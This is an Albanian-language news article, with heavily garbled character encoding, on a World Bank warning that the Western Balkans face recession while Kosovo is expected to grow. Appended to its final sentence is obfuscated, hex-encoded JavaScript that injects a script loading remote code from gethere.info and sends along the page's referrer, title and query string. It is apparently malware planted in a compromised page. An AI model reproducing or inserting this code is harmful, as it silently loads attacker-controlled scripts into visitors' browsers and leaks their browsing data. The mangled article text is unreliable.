f1_06ballk1352236442

BB: Ballkani, pA�rveA� KosovA�s, rrezikon recesionin

Banka BotA�rore ka tA�rhequr vA�rejtjen se Ballkani PerA�ndimor pA�rballet me recesion tA� thellA� kA�tA� vit, ku ka pasur njA� tkurrje prej 2.5 pA�r qind nA� Serbi, ndA�rsa rimA�kA�mbja nA� vitin 2013 do tA� jetA� a�?shumA� e ngadaltA�a�?, transmeton Reuters.A�

MegjithatA�, kA�tu bA�n pA�rjashtim Kosova, sipas koordinatores rajonale tA� BankA�s BotA�rore, Jane Armitage.

a�?VetA�m Kosova, shteti i ri me ekonomi tA� vogA�l prej 1.7 milionA� banorA�, duket se do tA� ketA� rritje, falA� nivelit tA� vogA�l tA� integrimit nA� tregun evropian, borxhit tA� ulA�t dhe investimeve tA� mA�dha nA� infrastrukturA�”, ka thA�nA� Armitage nA� njA� intervistA� pA�r agjencinA� e lajmeve, Reuters, transmeton REL.

Ajo tha se borxhi nA� disa vende tA� Ballkanit PerA�ndimor A�shtA� shumA� i lartA�.

a�?Do tA� thosha se borxhi nA� Mal tA� Zi, Serbi dhe ShqiA�pri A�shtA� nA� nivel rreziku, veA�anA�risht nA� ShqipA�ri deri 60 pA�r qind (tA� GDP-sA�)por po rritet shumA� shpejt nA� Serbi dhe Mal tA� Zi, ka thA�nA� koordinatorja e BankA�s BotA�rore pA�r Ballkanin PerA�ndimor.

Parashikimet e bankA�s pA�r SerbinA�, ekonominA� mA� tA� madhe tA� rajonit, janA� mA� pesimistet deri tash, derisa vendi po lufton pA�r tA� stimuluar rritjen.

ShqipA�ria dhe ish republikat tjera jugosllave kanA� parA� njA� rA�nie tA� eksportit dhe tA� investimeve direkte tA� huaja, pA�r shkak tA� krizA�s sA� borxheve nA� eurozonA�, qA� ka qenA� burimi kryesor i rajonit tA� Ballkanit pA�r tregti dhe investime.

Remitencat e qytetarA�ve jashtA� vendit janA� ulur, ndA�rsa dimri i egA�r dhe i gjatA�, si dhe vera e nxehtA� e ka goditur sektorin e bujqA�sisA� dhe hidrocentralet, ka thA�nA� Armitage.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}